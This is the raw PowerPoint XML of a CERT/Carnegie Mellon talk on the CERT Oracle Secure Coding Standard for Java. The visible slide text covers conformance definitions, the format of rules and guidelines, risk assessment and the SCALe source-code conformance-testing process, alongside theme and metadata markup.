                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="100"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="100"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Provably </a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Times New Roman"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>nonconforming</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                        <a:latin typeface="Arial"/>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marR="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="100"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="100"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Times New Roman Bold"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>The code is provably nonconforming if one or more violations of a rule are discovered for which no deviation has been allowed.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                        <a:latin typeface="Arial"/>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r>
              <a:tr h="365760">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="100"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="100"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Conforming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marL="0" marR="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="100"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="100"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Times New Roman Bold"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>The code is conforming if no violations of a rule can be identified.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                        <a:latin typeface="Arial"/>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r>
              <a:tr h="731520">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="100"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="100"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Provably </a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Times New Roman"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>conforming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marL="0" marR="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="100"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="100"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Times New Roman Bold"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Finally, the code is provably conforming if the code has been verified to adhere to the rule in all possible cases.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                        <a:latin typeface="Arial"/>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r>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="338344783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and Guidelines</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Rules and guidelines include </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Concise but not necessarily precise title</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Precise definition of the rule</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Noncompliant code examples or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>antipatterns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> in a pink frame—do not copy and paste into your code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Compliant solutions in a blue frame that conform with all rules and can be reused in your code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Risk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ssessment (rules only)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2267235536"/>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Assessment</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Risk assessment is performed using failure mode, effects, and criticality analysis.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1027" name="Object 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3142838725"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="139700" y="2216150"/>
          <a:ext cx="8694738" cy="4354513"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s3095" name="Document" r:id="rId3" imgW="5403679" imgH="2708694" progId="Word.Document.12">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Document" r:id="rId3" imgW="5403679" imgH="2708694" progId="Word.Document.12">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name=""/>
                      <p:cNvPicPr>
                        <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                      </p:cNvPicPr>
                      <p:nvPr/>
                    </p:nvPicPr>
                    <p:blipFill>
                      <a:blip r:embed="rId4"/>
                      <a:srcRect/>
                      <a:stretch>
                        <a:fillRect/>
                      </a:stretch>
                    </p:blipFill>
                    <p:spPr bwMode="auto">
                      <a:xfrm>
                        <a:off x="139700" y="2216150"/>
                        <a:ext cx="8694738" cy="4354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82906071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dirty="0" smtClean="0"/>
              <a:t>Priorities and Levels</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>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30699" y="1155187"/>
            <a:ext cx="8406401" cy="5081026"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="989094256"/>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 Code Analysis Laboratory</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287866" y="1100664"/>
            <a:ext cx="8458200" cy="5300135"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Source Code Analysis Laboratory (SCALe)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Consists of commercial, open source, and experimental analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Is used to analyze various code bases including those from the DoD, energy delivery systems, medical devices, and more</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Provides value to the customer but is also being instrumented to research the effectiveness of coding rules and analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>SCALe customer-focused process:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Customer submits source code to CERT for analysis.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Source is analyzed in SCALe using various analyzers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Results are analyzed, validated, and summarized.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>etailed report of findings is provided to guide repairs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>The developer addresses violations and resubmits repaired code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>The code is reassessed to ensure all violations have been properly mitigated.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>certification for the product version is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>published in a registry of certified systems.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3681893945"/>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CERT_SEI_Template.V1">
  <a:themeElements>
    <a:clrScheme name="DRAFT_CERT_SEI_Template 15">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="000000"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="666666"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="BBE0E3"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="990000"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="FFFFFF"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="000000"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="DAEDEF"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="8A0000"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="333399"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="663399"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="DRAFT_CERT_SEI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2309" tIns="46154" rIns="92309" bIns="46154" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
        <a:prstTxWarp prst="textNoShape">
          <a:avLst/>
        </a:prstTxWarp>
      </a:bodyPr>
      <a:lstStyle>
        <a:defPPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
          <a:lnSpc>
            <a:spcPct val="100000"/>
          </a:lnSpc>
          <a:spcBef>
            <a:spcPct val="30000"/>
          </a:spcBef>
          <a:spcAft>
            <a:spcPct val="0"/>
          </a:spcAft>
          <a:buClrTx/>
          <a:buSzTx/>
          <a:buFontTx/>
          <a:buNone/>
          <a:tabLst>
            <a:tab pos="292100" algn="l"/>
            <a:tab pos="571500" algn="l"/>
          </a:tabLst>
          <a:defRPr kumimoji="0" lang="en-US" sz="10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2309" tIns="46154" rIns="92309" bIns="46154" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
        <a:prstTxWarp prst="textNoShape">
          <a:avLst/>
        </a:prstTxWarp>
      </a:bodyPr>
      <a:lstStyle>
        <a:defPPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
          <a:lnSpc>
            <a:spcPct val="100000"/>
          </a:lnSpc>
          <a:spcBef>
            <a:spcPct val="30000"/>
          </a:spcBef>
          <a:spcAft>
            <a:spcPct val="0"/>
          </a:spcAft>
          <a:buClrTx/>
          <a:buSzTx/>
          <a:buFontTx/>
          <a:buNone/>
          <a:tabLst>
            <a:tab pos="292100" algn="l"/>
            <a:tab pos="571500" algn="l"/>
          </a:tabLst>
          <a:defRPr kumimoji="0" lang="en-US" sz="10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DRAFT_CERT_SEI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RAFT_CERT_SEI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RAFT_CERT_SEI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RAFT_CERT_SEI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RAFT_CERT_SEI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RAFT_CERT_SEI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RAFT_CERT_SEI_Templa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RAFT_CERT_SEI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RAFT_CERT_SEI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RAFT_CERT_SEI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RAFT_CERT_SEI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RAFT_CERT_SEI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RAFT_CERT_SEI_Template 13">
        <a:dk1>
          <a:srgbClr val="000000"/>
        </a:dk1>
        <a:lt1>
          <a:srgbClr val="FFFFFF"/>
        </a:lt1>
        <a:dk2>
          <a:srgbClr val="000000"/>
        </a:dk2>
        <a:lt2>
          <a:srgbClr val="666666"/>
        </a:lt2>
        <a:accent1>
          <a:srgbClr val="BBE0E3"/>
        </a:accent1>
        <a:accent2>
          <a:srgbClr val="333399"/>
        </a:accent2>
        <a:accent3>
          <a:srgbClr val="FFFFFF"/>
        </a:accent3>
        <a:accent4>
          <a:srgbClr val="000000"/>
        </a:accent4>
        <a:accent5>
          <a:srgbClr val="DAEDEF"/>
        </a:accent5>
        <a:accent6>
          <a:srgbClr val="2D2D8A"/>
        </a:accent6>
        <a:hlink>
          <a:srgbClr val="336699"/>
        </a:hlink>
        <a:folHlink>
          <a:srgbClr val="99CC00"/>
        </a:folHlink>
      </a:clrScheme>
      <a:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
    </a:extraClrScheme>
    <a:extraClrScheme>
      <a:clrScheme name="DRAFT_CERT_SEI_Template 14">
        <a:dk1>
          <a:srgbClr val="000000"/>
        </a:dk1>
        <a:lt1>
          <a:srgbClr val="FFFFFF"/>
        </a:lt1>
        <a:dk2>
          <a:srgbClr val="000000"/>
        </a:dk2>
        <a:lt2>
          <a:srgbClr val="666666"/>
        </a:lt2>
        <a:accent1>
          <a:srgbClr val="BBE0E3"/>
        </a:accent1>
        <a:accent2>
          <a:srgbClr val="990000"/>
        </a:accent2>
        <a:accent3>
          <a:srgbClr val="FFFFFF"/>
        </a:accent3>
        <a:accent4>
          <a:srgbClr val="000000"/>
        </a:accent4>
        <a:accent5>
          <a:srgbClr val="DAEDEF"/>
        </a:accent5>
        <a:accent6>
          <a:srgbClr val="8A0000"/>
        </a:accent6>
        <a:hlink>
          <a:srgbClr val="6633CC"/>
        </a:hlink>
        <a:folHlink>
          <a:srgbClr val="333399"/>
        </a:folHlink>
      </a:clrScheme>
      <a:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
    </a:extraClrScheme>
    <a:extraClrScheme>
      <a:clrScheme name="DRAFT_CERT_SEI_Template 15">
        <a:dk1>
          <a:srgbClr val="000000"/>
        </a:dk1>
        <a:lt1>
          <a:srgbClr val="FFFFFF"/>
        </a:lt1>
        <a:dk2>
          <a:srgbClr val="000000"/>
        </a:dk2>
        <a:lt2>
          <a:srgbClr val="666666"/>
        </a:lt2>
        <a:accent1>
          <a:srgbClr val="BBE0E3"/>
        </a:accent1>
        <a:accent2>
          <a:srgbClr val="990000"/>
        </a:accent2>
        <a:accent3>
          <a:srgbClr val="FFFFFF"/>
        </a:accent3>
        <a:accent4>
          <a:srgbClr val="000000"/>
        </a:accent4>
        <a:accent5>
          <a:srgbClr val="DAEDEF"/>
        </a:accent5>
        <a:accent6>
          <a:srgbClr val="8A0000"/>
        </a:accent6>
        <a:hlink>
          <a:srgbClr val="333399"/>
        </a:hlink>
        <a:folHlink>
          <a:srgbClr val="6633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USCYBERCOM</Template>
  <TotalTime>23337</TotalTime>
  <Words>3430</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>618</Paragraphs>
  <Slides>49</Slides>
  <Notes>33</Notes>
  <HiddenSlides>1</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49</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="51" baseType="lpstr">
      <vt:lpstr>CERT_SEI_Template.V1</vt:lpstr>
      <vt:lpstr>Document</vt:lpstr>
      <vt:lpstr>Inside the CERT Oracle Secure Coding Standard for Java [CON2368] </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>CERT Secure Coding Standards</vt:lpstr>
      <vt:lpstr>SCALe Conformance Testing</vt:lpstr>
      <vt:lpstr>Rules and Guidelines</vt:lpstr>
      <vt:lpstr>Risk Assessment</vt:lpstr>
      <vt:lpstr>Priorities and Levels</vt:lpstr>
      <vt:lpstr>Source Code Analysis Laboratory</vt:lpstr>
      <vt:lpstr>Government Demand</vt:lpstr>
      <vt:lpstr>Industry Demand</vt:lpstr>
      <vt:lpstr>Source Code Analysis Laboratory</vt:lpstr>
      <vt:lpstr>Conformance Testing Process</vt:lpstr>
      <vt:lpstr>SCALe Demo Videos</vt:lpstr>
      <vt:lpstr>Rule Coverage</vt:lpstr>
      <vt:lpstr>Select SCALe Java Assessments</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Serialization Killer</vt:lpstr>
      <vt:lpstr>Deserialization</vt:lpstr>
      <vt:lpstr>AtomicReferenceArray&lt;E&gt; Class  1</vt:lpstr>
      <vt:lpstr>AtomicReferenceArray&lt;E&gt; Class 2</vt:lpstr>
      <vt:lpstr>AtomicReferenceArray&lt;E&gt; Fix</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Java Collections Framework History</vt:lpstr>
      <vt:lpstr>Java Collections Framework </vt:lpstr>
      <vt:lpstr>Methods</vt:lpstr>
      <vt:lpstr>ShortSet Example</vt:lpstr>
      <vt:lpstr>ShortSet Example</vt:lpstr>
      <vt:lpstr>ShortSet Solution</vt:lpstr>
      <vt:lpstr>Collections Framework equals()</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Heap Pollution</vt:lpstr>
      <vt:lpstr>Heap Pollution Example 1</vt:lpstr>
      <vt:lpstr>Heap Pollution Example 2</vt:lpstr>
      <vt:lpstr>Mitigation: Avoid Raw Types</vt:lpstr>
      <vt:lpstr>Legacy Code</vt:lpstr>
      <vt:lpstr>Mitigation: Checked Collection</vt:lpstr>
      <vt:lpstr>Arrays</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Trusted and Untrusted Code</vt:lpstr>
      <vt:lpstr>Trust Boundaries</vt:lpstr>
      <vt:lpstr>Command Injection</vt:lpstr>
      <vt:lpstr>Attack Scenario</vt:lpstr>
      <vt:lpstr>Validation &amp; Sanitization</vt:lpstr>
      <vt:lpstr>Validation</vt:lpstr>
      <vt:lpstr>Sanitization</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Java Coding Guidelines: Now Available Free Online</vt:lpstr>
      <vt:lpstr>For More Information</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>Carnegie Mellon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jblake</dc:creator>
  <cp:lastModifiedBy>Robert C. Seacord</cp:lastModifiedBy>
  <cp:revision>493</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-06-02T14:12:03Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2014-10-02T21:17:55Z</dcterms:modified>
</cp:coreProperties>
</file>